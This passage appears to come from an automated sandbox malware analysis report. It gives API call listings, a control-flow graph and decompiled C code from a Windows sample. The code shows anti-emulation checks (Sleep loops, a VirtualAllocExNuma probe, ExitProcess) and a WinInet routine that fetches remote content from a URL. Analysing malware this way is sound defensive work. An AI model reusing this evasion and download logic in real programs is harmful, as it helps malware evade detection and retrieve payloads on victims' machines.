                                                                                0x0040c4e4
                                                                                0x0040c4ea
                                                                                0x0040c4f1
                                                                                0x0040c4f7
                                                                                0x0040c4fd
                                                                                0x0040c500
                                                                                0x0040c501
                                                                                0x0040c502
                                                                                0x0040c506
                                                                                0x0040c509
                                                                                0x0040c513
                                                                                0x0040c515
                                                                                0x0040c517
                                                                                0x0040c51a
                                                                                0x0040c51d
                                                                                0x0040c523
                                                                                0x0040c524
                                                                                0x0040c529
                                                                                0x0040c52a
                                                                                0x0040c52c
                                                                                0x0040c52f
                                                                                0x0040c536
                                                                                0x0040c540
                                                                                0x0040c547
                                                                                0x0040c54e
                                                                                0x0040c559
                                                                                0x0040c55e
                                                                                0x0040c560
                                                                                0x0040c567
                                                                                0x0040c56d
                                                                                0x0040c573
                                                                                0x0040c57a
                                                                                0x0040c57a
                                                                                0x0040c580
                                                                                0x0040c586
                                                                                0x0040c58d
                                                                                0x0040c5a3
                                                                                0x0040c5aa
                                                                                0x0040c5b0
                                                                                0x0040c5b2
                                                                                0x0040c5b5
                                                                                0x0040c5b5
                                                                                0x0040c5bb
                                                                                0x0040c5c1
                                                                                0x0040c5c8
                                                                                0x0040c5ce
                                                                                0x0040c5d4
                                                                                0x0040c5db
                                                                                0x0040c5e2
                                                                                0x0040c5e9
                                                                                0x0040c5ef
                                                                                0x0040c603

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040C415
                                                                                • GetProcAddress.KERNEL32(00000000,Sleep), ref: 0040C42D
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemTime), ref: 0040C43A
                                                                                  • Part of subcall function 0040C372: ExitProcess.KERNEL32 ref: 0040C3EA
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C446
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C44D
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C454
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C45B
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C462
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C469
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C475
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C47C
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C483
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C48A
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C491
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C498
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C49F
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4A6
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4AD
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4B4
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4BB
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4C2
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4C9
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4D0
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4D7
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4DE
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4EA
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C4F1
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C52F
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C536
                                                                                • GetSystemTime.KERNEL32(?), ref: 0040C540
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C547
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C54E
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C560
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C567
                                                                                • _rand.LIBCMT ref: 0040C56D
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C573
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C57A
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C586
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C58D
                                                                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0040C5A3
                                                                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 0040C5AA
                                                                                • ExitProcess.KERNEL32 ref: 0040C5B5
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5C1
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5C8
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5D4
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5DB
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5E2
                                                                                • Sleep.KERNEL32(00000010), ref: 0040C5E9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$Process$AddressExitProc$AllocCurrentLibraryLoadNumaSystemTimeVirtual_rand
                                                                                • String ID: GetSystemTime$Sleep$kernel32.dll
                                                                                • API String ID: 1838750863-3444385320
                                                                                • Opcode ID: d76eb9dd382dc1332bc95f8ce0d538547e1921b36f15bac26583e63813a7f503
                                                                                • Instruction ID: 6363f1592e63a850070f9e026acd34af07ec758d9a355fcb3cfe72e0293abcfc
                                                                                • Opcode Fuzzy Hash: d76eb9dd382dc1332bc95f8ce0d538547e1921b36f15bac26583e63813a7f503
                                                                                • Instruction Fuzzy Hash: 3E51AB39481924ABC7227FB5AC4D9DF7A78AF0B3557000475F60AA1160CF38569E8BAF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 395 40a0c4-40a1a1 call 421975 call 409f80 call 40cfb8 call 402c34 call 40d08a 406 40a1a3-40a1bb call 40d08a 395->406 407 40a1bd 395->407 406->407 409 40a1c0-40a1df call 40cffc 406->409 407->409 413 40a1e1-40a215 call 403a16 409->413 414 40a217-40a230 call 40c689 409->414 419 40a237-40a248 call 40cfb8 413->419 414->419 422 40a259-40a264 419->422 423 40a24a-40a254 call 402c34 419->423 425 40a266-40a273 call 402c34 422->425 426 40a278-40a284 422->426 423->422 425->426 428 40a286-40a28d 426->428 429 40a297-40a29e 426->429 430 40a2ac-40a2bb 428->430 431 40a28f-40a295 428->431 432 40a2a0 429->432 433 40a2a6 429->433 434 40a2c3-40a322 call 40d6b9 call 40cfb8 call 402c34 call 40c664 430->434 435 40a2bd 430->435 431->430 432->433 433->430 444 40a342-40a358 call 40410f 434->444 445 40a324-40a340 call 40c689 434->445 435->434 450 40a35c-40a36d call 40cfb8 444->450 445->450 453 40a37e-40a389 450->453 454 40a36f-40a379 call 402c34 450->454 456 40a38b-40a398 call 402c34 453->456 457 40a39d-40a3b2 call 40c664 453->457 454->453 456->457 461 40a3b4-40a3cc call 40c689 457->461 462 40a3ce-40a400 call 403a16 457->462 467 40a406-40a414 call 40cfb8 461->467 462->467 470 40a416-40a423 call 402c34 467->470 471 40a428-40a433 467->471 470->471 473 40a444-40a44a 471->473 474 40a435-40a43f call 402c34 471->474 476 40a452-40a482 call 40c689 call 40cfb8 call 402c34 473->476 477 40a44c 473->477 474->473 484 40a4a2-40a4d7 call 403a16 476->484 485 40a484-40a4a0 call 40c689 476->485 477->476 490 40a4dd-40a4eb call 40cfb8 484->490 485->490 493 40a502-40a50d 490->493 494 40a4ed-40a4fd call 402c34 490->494 495 40a51e-40a536 call 40c664 493->495 496 40a50f-40a519 call 402c34 493->496 494->493 501 40a558-40a58d call 403a16 495->501 502 40a538-40a556 call 40c689 495->502 496->495 507 40a593-40a5a4 call 40cfb8 501->507 502->507 510 40a5a6-40a5b6 call 402c34 507->510 511 40a5bb-40a5c9 507->511 510->511 512 40a5cb-40a5d8 call 402c34 511->512 513 40a5dd-40a5e7 511->513 512->513 516 40a606-40a616 call 40410f 513->516 517 40a5e9-40a604 call 40c689 513->517 522 40a61d-40a634 call 40cfb8 516->522 517->522 525 40a636-40a642 call 402c34 522->525 526 40a647-40a655 522->526 525->526 527 40a664-40a66e 526->527 528 40a657-40a65f call 402c34 526->528 531 40a670 527->531 532 40a673-40a687 DeleteUrlCacheEntry 527->532 528->527 531->532 533 40a689 532->533 534 40a68f-40a6ae DeleteUrlCacheEntry InternetOpenA 532->534 533->534 535 40a6b0-40a6ba 534->535 536 40a6bc-40a6c3 534->536 537 40a6c4-40a6c7 535->537 536->537 538 40a7ad-40a7b3 537->538 539 40a6cd-40a6d7 537->539 540 40a7b4-40a83d call 40381a call 402c34 * 7 call 41deb4 538->540 541 40a6d9 539->541 542 40a6dc-40a6f2 InternetConnectA 539->542 541->542 544 40a7a4-40a7a7 InternetCloseHandle 542->544 545 40a6f8-40a705 542->545 544->538 547 40a707 545->547 548 40a70d-40a723 HttpOpenRequestA 545->548 547->548 549 40a725-40a751 HttpSendRequestA HttpQueryInfoA 548->549 550 40a79b-40a79e InternetCloseHandle 548->550 552 40a753-40a758 549->552 553 40a75a-40a76c call 41f2f3 549->553 550->544 552->540 553->552 560 40a76e-40a771 553->560 562 40a773-40a78d InternetReadFile 560->562 563 40a794-40a795 InternetCloseHandle 560->563 562->563 563->550
                                                                                C-Code - Quality: 93%
                                                                                			E0040A0C4(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* __ebp;
                                                                                				signed int _t268;
                                                                                				intOrPtr _t273;
                                                                                				void* _t276;
                                                                                				long _t283;
                                                                                				void* _t285;
                                                                                				intOrPtr _t287;
                                                                                				intOrPtr _t288;
                                                                                				void* _t297;
                                                                                				long _t300;
                                                                                				void* _t302;
                                                                                				void* _t306;
                                                                                				void* _t311;
                                                                                				void* _t314;
                                                                                				void* _t316;
                                                                                				void* _t318;
                                                                                				void* _t319;
                                                                                				char* _t321;
                                                                                				char* _t323;
                                                                                				void* _t325;
                                                                                				char* _t337;
                                                                                				void* _t338;
                                                                                				void* _t340;
                                                                                				long _t342;
                                                                                				void* _t347;
                                                                                				void* _t377;
                                                                                				long _t383;
                                                                                				void* _t384;
                                                                                				char* _t400;
                                                                                				void* _t422;
                                                                                				void* _t425;
                                                                                				void* _t428;
                                                                                				long _t438;
                                                                                				char* _t439;
                                                                                				void* _t440;
                                                                                				void* _t441;
                                                                                				signed int _t447;
                                                                                				void* _t449;
                                                                                
                                                                                				_t447 = _t449 - 0xd94;
                                                                                				_t268 =  *0x447674; // 0x4124c941
                                                                                				 *(_t447 + 0xd98) = _t268 ^ _t447;
                                                                                				_push(0x18);
                                                                                				E00421975(E004362AF, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t447 - 0x20)) =  *((intOrPtr*)(_t447 + 0xda4));
                                                                                				 *(_t447 - 0x10) = 0;
                                                                                				 *(_t447 - 4) = 0;
                                                                                				_t273 = 0xf;
                                                                                				 *((intOrPtr*)(_t447 + 0xa0)) = _t273;
                                                                                				 *((intOrPtr*)(_t447 + 0x9c)) = 0;
                                                                                				 *(_t447 + 0x8c) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0x84)) = _t273;
                                                                                				 *(_t447 + 0x80) = 0;
                                                                                				 *(_t447 + 0x70) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0xbc)) = _t273;
                                                                                				 *(_t447 + 0xb8) = 0;
                                                                                				 *((char*)(_t447 + 0xa8)) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0x30)) = _t273;
                                                                                				 *((intOrPtr*)(_t447 + 0x2c)) = 0;
                                                                                				 *((char*)(_t447 + 0x1c)) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0x4c)) = _t273;
                                                                                				 *((intOrPtr*)(_t447 + 0x48)) = 0;
                                                                                				 *((char*)(_t447 + 0x38)) = 0;
                                                                                				 *((intOrPtr*)(_t447 + 0x14)) = _t273;
                                                                                				 *((intOrPtr*)(_t447 + 0x10)) = 0;
                                                                                				 *_t447 = 0;
                                                                                				 *(_t447 - 4) = 6;
                                                                                				 *(_t447 - 0x14) = 0;
                                                                                				_t276 = E00409F80(_t447 + 0xda8, __ecx, _t447 + 0xc4);
                                                                                				 *(_t447 - 4) = 7;
                                                                                				E0040CFB8(_t447 + 0xa8, _t276);
                                                                                				 *(_t447 - 4) = 6;
                                                                                				E00402C34(_t447 + 0xc4, 1, 0);
                                                                                				_t425 = 8;
                                                                                				_t407 = _t447 + 0xa8;
                                                                                				if(E0040D08A(_t425, _t447 + 0xa8, "https://", _t425) == 0) {
                                                                                					L2:
                                                                                					 *(_t447 - 0x14) = _t425;
                                                                                					L3:
                                                                                					_t382 = _t447 + 0xa8;
                                                                                					 *((char*)(_t447 - 0x18)) = 0x2f;
                                                                                					_t283 = E0040CFFC( *(_t447 - 0x14) + 1, _t447 + 0xa8, _t447 + 0xa8, _t447 - 0x18, 1);
                                                                                					 *(_t447 - 0x1c) = _t283;
                                                                                					_t455 = _t283 - 0xffffffff;
                                                                                					if(_t283 != 0xffffffff) {
                                                                                						_t285 = E0040C689(_t382, _t447 + 0x54, _t447 + 0xa8, _t283, 0xffffffff);
                                                                                						 *(_t447 - 4) = 9;
                                                                                						 *(_t447 - 0x10) = 2;
                                                                                					} else {
                                                                                						 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                						 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                						 *((char*)(_t447 + 0xc4)) = 0;
                                                                                						E00403A16(_t447 + 0xc4, _t455, 0x43e028, 0);
                                                                                						 *(_t447 - 4) = 8;
                                                                                						_t285 = _t447 + 0xc4;
                                                                                						 *(_t447 - 0x10) = 1;
                                                                                					}
                                                                                					_t427 = _t285;
                                                                                					_t412 = _t447 + 0x8c;
                                                                                					E0040CFB8(_t447 + 0x8c, _t285);
                                                                                					if(( *(_t447 - 0x10) & 0x00000002) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffffd;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000001) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffffe;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					_t383 =  *(_t447 - 0x1c);
                                                                                					_t287 =  *((intOrPtr*)(_t447 + 0xa8));
                                                                                					if(_t383 == 0xffffffff) {
                                                                                						__eflags =  *((intOrPtr*)(_t447 + 0xbc)) - 0x10;
                                                                                						if(__eflags < 0) {
                                                                                							_t287 = _t447 + 0xa8;
                                                                                						}
                                                                                						_t383 =  *(_t447 + 0xb8);
                                                                                					} else {
                                                                                						if( *((intOrPtr*)(_t447 + 0xbc)) < 0x10) {
                                                                                							_t287 = _t447 + 0xa8;
                                                                                						}
                                                                                					}
                                                                                					_t384 = _t383 + _t287;
                                                                                					_t462 =  *((intOrPtr*)(_t447 + 0xbc)) - 0x10;
                                                                                					_t288 =  *((intOrPtr*)(_t447 + 0xa8));
                                                                                					if( *((intOrPtr*)(_t447 + 0xbc)) < 0x10) {
                                                                                						_t288 = _t447 + 0xa8;
                                                                                					}
                                                                                					_push( *(_t447 - 0x24));
                                                                                					_push(_t384);
                                                                                					_push(_t288 +  *(_t447 - 0x14));
                                                                                					_push(_t447 + 0xc4);
                                                                                					 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                					 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                					 *((char*)(_t447 + 0xc4)) = 0;
                                                                                					E0040D6B9(0, _t407, _t412, _t427, _t462);
                                                                                					_t428 = _t447 + 0xc4;
                                                                                					 *(_t447 - 4) = 0xa;
                                                                                					E0040CFB8(_t447 + 0x70, _t428);
                                                                                					_t385 = _t428;
                                                                                					 *(_t447 - 4) = 6;
                                                                                					E00402C34(_t428, 1, 0);
                                                                                					if(E0040C664(_t447 + 0x8c, "#", 0) == 0xffffffff) {
                                                                                						_t297 = E0040410F(_t447 + 0x54, _t447 + 0x8c);
                                                                                						 *(_t447 - 4) = 0xc;
                                                                                						_t94 = _t447 - 0x10;
                                                                                						 *_t94 =  *(_t447 - 0x10) | 0x00000008;
                                                                                						__eflags =  *_t94;
                                                                                					} else {
                                                                                						_t297 = E0040C689(_t385, _t447 + 0xc4, _t447 + 0x8c, 0, _t295);
                                                                                						 *(_t447 - 4) = 0xb;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000004;
                                                                                					}
                                                                                					E0040CFB8(_t447 + 0x8c, _t297);
                                                                                					if(( *(_t447 - 0x10) & 0x00000008) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffff7;
                                                                                						_t385 = _t447 + 0x54;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000004) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffffb;
                                                                                						_t385 = _t447 + 0xc4;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					_t300 = E0040C664(_t447 + 0x70, ":", 0);
                                                                                					 *(_t447 - 0x1c) = _t300;
                                                                                					if(_t300 == 0xffffffff) {
                                                                                						_t385 = _t447 + 0xc4;
                                                                                						 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                						 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                						 *((char*)(_t447 + 0xc4)) = 0;
                                                                                						E00403A16(_t447 + 0xc4, __eflags, 0x43e028, 0);
                                                                                						 *(_t447 - 4) = 0xe;
                                                                                						_t122 = _t447 - 0x10;
                                                                                						 *_t122 =  *(_t447 - 0x10) | 0x00000020;
                                                                                						__eflags =  *_t122;
                                                                                						_t302 = _t447 + 0xc4;
                                                                                					} else {
                                                                                						_t302 = E0040C689(_t385, _t447 + 0x54, _t447 + 0x70, _t300 + 1, 0xffffffff);
                                                                                						 *(_t447 - 4) = 0xd;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000010;
                                                                                					}
                                                                                					E0040CFB8(_t447 + 0x38, _t302);
                                                                                					if(( *(_t447 - 0x10) & 0x00000020) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xffffffdf;
                                                                                						_t385 = _t447 + 0xc4;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000010) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xffffffef;
                                                                                						_t385 = _t447 + 0x54;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					_t304 =  *(_t447 - 0x1c);
                                                                                					if( *(_t447 - 0x1c) == 0xffffffff) {
                                                                                						_t304 =  *(_t447 + 0x80);
                                                                                					}
                                                                                					_t306 = E0040C689(_t385, _t447 + 0x54, _t447 + 0x70, 0, _t304);
                                                                                					 *(_t447 - 4) = 0xf;
                                                                                					E0040CFB8(_t447 + 0x70, _t306);
                                                                                					_t386 = _t447 + 0x54;
                                                                                					 *(_t447 - 4) = 6;
                                                                                					E00402C34(_t447 + 0x54, 1, 0);
                                                                                					_t309 =  *(_t447 - 0x14);
                                                                                					if( *(_t447 - 0x14) <= 0) {
                                                                                						_t386 = _t447 + 0xc4;
                                                                                						 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                						 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                						 *((char*)(_t447 + 0xc4)) = 0;
                                                                                						E00403A16(_t447 + 0xc4, __eflags, 0x43e028, 0);
                                                                                						 *(_t447 - 4) = 0x11;
                                                                                						_t158 = _t447 - 0x10;
                                                                                						 *_t158 =  *(_t447 - 0x10) | 0x00000080;
                                                                                						__eflags =  *_t158;
                                                                                						_t311 = _t447 + 0xc4;
                                                                                					} else {
                                                                                						_t311 = E0040C689(_t386, _t447 + 0x54, _t447 + 0xa8, 0, _t309 + 0xfffffffd);
                                                                                						 *(_t447 - 4) = 0x10;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000040;
                                                                                					}
                                                                                					E0040CFB8(_t447 + 0x1c, _t311);
                                                                                					if(( *(_t447 - 0x10) & 0x00000080) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xffffff7f;
                                                                                						_t386 = _t447 + 0xc4;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000040) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xffffffbf;
                                                                                						_t386 = _t447 + 0x54;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					_t314 = E0040C664(_t447 + 0x8c, "?", 0);
                                                                                					 *(_t447 - 0x14) = _t314;
                                                                                					if(_t314 == 0xffffffff) {
                                                                                						_t386 = _t447 + 0xc4;
                                                                                						 *((intOrPtr*)(_t447 + 0xd8)) = 0xf;
                                                                                						 *((intOrPtr*)(_t447 + 0xd4)) = 0;
                                                                                						 *((char*)(_t447 + 0xc4)) = 0;
                                                                                						E00403A16(_t447 + 0xc4, __eflags, 0x43e028, 0);
                                                                                						 *(_t447 - 4) = 0x13;
                                                                                						_t187 = _t447 - 0x10;
                                                                                						 *_t187 =  *(_t447 - 0x10) | 0x00000200;
                                                                                						__eflags =  *_t187;
                                                                                						_t316 = _t447 + 0xc4;
                                                                                					} else {
                                                                                						_t316 = E0040C689(_t386, _t447 + 0x54, _t447 + 0x8c, _t314 + 1, 0xffffffff);
                                                                                						 *(_t447 - 4) = 0x12;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000100;
                                                                                					}
                                                                                					E0040CFB8(_t447, _t316);
                                                                                					if(( *(_t447 - 0x10) & 0x00000200) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffdff;
                                                                                						_t386 = _t447 + 0xc4;
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000100) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffffeff;
                                                                                						_t386 = _t447 + 0x54;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					_t318 = _t447 + 0x8c;
                                                                                					if( *(_t447 - 0x14) == 0xffffffff) {
                                                                                						_t319 = E0040410F(_t447 + 0x54, _t318);
                                                                                						 *(_t447 - 4) = 0x15;
                                                                                						_t212 = _t447 - 0x10;
                                                                                						 *_t212 =  *(_t447 - 0x10) | 0x00000800;
                                                                                						__eflags =  *_t212;
                                                                                					} else {
                                                                                						_t319 = E0040C689(_t386, _t447 + 0xc4, _t318, 0,  *(_t447 - 0x14));
                                                                                						 *(_t447 - 4) = 0x14;
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) | 0x00000400;
                                                                                					}
                                                                                					E0040CFB8(_t447 + 0x8c, _t319);
                                                                                					if(( *(_t447 - 0x10) & 0x00000800) != 0) {
                                                                                						 *(_t447 - 0x10) =  *(_t447 - 0x10) & 0xfffff7ff;
                                                                                						E00402C34(_t447 + 0x54, 1, 0);
                                                                                					}
                                                                                					 *(_t447 - 4) = 6;
                                                                                					if(( *(_t447 - 0x10) & 0x00000400) != 0) {
                                                                                						E00402C34(_t447 + 0xc4, 1, 0);
                                                                                					}
                                                                                					_t321 =  *(_t447 + 0x70);
                                                                                					if( *((intOrPtr*)(_t447 + 0x84)) < 0x10) {
                                                                                						_t321 = _t447 + 0x70;
                                                                                					}
                                                                                					DeleteUrlCacheEntry(_t321); // executed
                                                                                					_t323 =  *(_t447 + 0xda8);
                                                                                					if( *((intOrPtr*)(_t447 + 0xdbc)) < 0x10) {
                                                                                						_t323 = _t447 + 0xda8;
                                                                                					}
                                                                                					DeleteUrlCacheEntry(_t323);
                                                                                					_t325 = InternetOpenA(0x43e028, 0, 0, 0, 0); // executed
                                                                                					 *(_t447 - 0x14) = _t325;
                                                                                					if( *((intOrPtr*)(_t447 + 0xdc4)) == 0) {
                                                                                						_t438 = 0x4000000;
                                                                                						0x1bb = 0x50;
                                                                                					} else {
                                                                                						_t438 = 0x4800000;
                                                                                					}
                                                                                					if( *(_t447 - 0x14) == 0) {
                                                                                						L77:
                                                                                						_push(_t447 + 0xe0);
                                                                                						goto L78;
                                                                                					} else {
                                                                                						_t337 =  *(_t447 + 0x70);
                                                                                						if( *((intOrPtr*)(_t447 + 0x84)) < 0x10) {
                                                                                							_t337 = _t447 + 0x70;
                                                                                						}
                                                                                						_t338 = InternetConnectA( *(_t447 - 0x14), _t337, 0x1bb, 0, 0, 3, _t438, 0); // executed
                                                                                						 *(_t447 - 0x24) = _t338;
                                                                                						if(_t338 == 0) {
                                                                                							L76:
                                                                                							InternetCloseHandle( *(_t447 - 0x14));
                                                                                							goto L77;
                                                                                						} else {
                                                                                							_t400 =  *(_t447 + 0x8c);
                                                                                							if( *((intOrPtr*)(_t447 + 0xa0)) < 0x10) {
                                                                                								_t400 = _t447 + 0x8c;
                                                                                							}
                                                                                							_t340 = HttpOpenRequestA(_t338, "GET", _t400, 0, 0, 0, _t438, 0); // executed
                                                                                							_t441 = _t340;
                                                                                							if(_t441 == 0) {
                                                                                								L75:
                                                                                								InternetCloseHandle( *(_t447 - 0x24));
                                                                                								goto L76;
                                                                                							} else {
                                                                                								_t342 = HttpSendRequestA(_t441, 0, 0, 0, 0); // executed
                                                                                								 *(_t447 - 0x10) = _t342;
                                                                                								 *(_t447 - 0x1c) = 0x100;
                                                                                								if(HttpQueryInfoA(_t441, 0x13, _t447 + 0xc98, _t447 - 0x1c, 0) != 0) {
                                                                                									_push(_t447 + 0xc98);
                                                                                									_t347 = E0041F2F3();
                                                                                									__eflags = _t347 - 0xc8;
                                                                                									if(_t347 != 0xc8) {
                                                                                										goto L70;
                                                                                									}
                                                                                									__eflags =  *(_t447 - 0x10);
                                                                                									if( *(_t447 - 0x10) != 0) {
                                                                                										InternetReadFile(_t441, _t447 + 0xe0, 0xbb7, _t447 - 0x10); // executed
                                                                                										 *((char*)(_t447 +  *(_t447 - 0x10) + 0xe0)) = 0;
                                                                                									}
                                                                                									InternetCloseHandle(_t441); // executed
                                                                                									goto L75;
                                                                                								}
                                                                                								L70:
                                                                                								_push("ERROR");
                                                                                								L78:
                                                                                								_t439 =  *((intOrPtr*)(_t447 - 0x20));
                                                                                								 *((intOrPtr*)(_t439 + 0x14)) = 0xf;
                                                                                								 *((intOrPtr*)(_t439 + 0x10)) = 0;
                                                                                								 *_t439 = 0;
                                                                                								E0040381A(_t439);
                                                                                								E00402C34(_t447, 1, 0);
                                                                                								E00402C34(_t447 + 0x38, 1, 0);
                                                                                								E00402C34(_t447 + 0x1c, 1, 0);
                                                                                								E00402C34(_t447 + 0xa8, 1, 0);
                                                                                								E00402C34(_t447 + 0x70, 1, 0);
                                                                                								E00402C34(_t447 + 0x8c, 1, 0);
                                                                                								E00402C34(_t447 + 0xda8, 1, 0);
                                                                                								 *[fs:0x0] =  *((intOrPtr*)(_t447 - 0xc));
                                                                                								_pop(_t422);
                                                                                								_pop(_t440);
                                                                                								_pop(_t377);
                                                                                								return E0041DEB4(_t439, _t377,  *(_t447 + 0xd98) ^ _t447, _t407, _t422, _t440);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t425 = 7;
                                                                                				_t407 = _t447 + 0xa8;
                                                                                				if(E0040D08A(_t425, _t447 + 0xa8, "http://", _t425) != 0) {
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L2;
                                                                                			}









































                                                                                0x0040a0cb
                                                                                0x0040a0cf
                                                                                0x0040a0d6
                                                                                0x0040a0dc
                                                                                0x0040a0e3
                                                                                0x0040a0f0
                                                                                0x0040a0f3
                                                                                0x0040a0f8
                                                                                0x0040a0fb
                                                                                0x0040a0fc
                                                                                0x0040a102
                                                                                0x0040a108
                                                                                0x0040a10e
                                                                                0x0040a114
                                                                                0x0040a11a
                                                                                0x0040a11d
                                                                                0x0040a123
                                                                                0x0040a129
                                                                                0x0040a12f
                                                                                0x0040a132
                                                                                0x0040a135
                                                                                0x0040a138
                                                                                0x0040a13b
                                                                                0x0040a13e
                                                                                0x0040a141
                                                                                0x0040a144
                                                                                0x0040a147
                                                                                0x0040a157
                                                                                0x0040a15b
                                                                                0x0040a15e
                                                                                0x0040a16c
                                                                                0x0040a170
                                                                                0x0040a180
                                                                                0x0040a184
                                                                                0x0040a18b
                                                                                0x0040a194
                                                                                0x0040a1a1
                                                                                0x0040a1bd
                                                                                0x0040a1bd
                                                                                0x0040a1c0
                                                                                0x0040a1c8
                                                                                0x0040a1d0
                                                                                0x0040a1d4
                                                                                0x0040a1d9
                                                                                0x0040a1dc
                                                                                0x0040a1df
                                                                                0x0040a224
                                                                                0x0040a229
                                                                                0x0040a230
                                                                                0x0040a1e1
                                                                                0x0040a1ed
                                                                                0x0040a1f7
